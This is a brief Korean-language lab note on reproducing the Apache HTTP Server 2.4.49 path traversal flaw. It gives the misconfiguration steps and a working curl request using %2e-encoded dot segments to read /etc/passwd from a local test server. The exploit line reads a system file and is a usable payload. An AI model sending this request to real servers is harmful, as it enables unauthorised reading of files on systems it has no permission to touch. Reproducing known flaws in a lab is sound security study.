
Apache HTTP Server 2.4.49 경로 탐색 취약점 재현
ap_normalize_path 구현 결함으로, 공격자는 %2e 인코딩이 포함된 특수 요청을 구성하여 접근 제어를 우회하고 웹 서버의 임의 파일을 읽을 수 있습니다.<Directory />의 Require all denied를 Require all granted로 변경/tmp/vuln_dir을 가리키는 Alias /vuln 추가 및 권한 설정curl -v --path-as-is 'http://127.0.0.1:8080/vuln/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
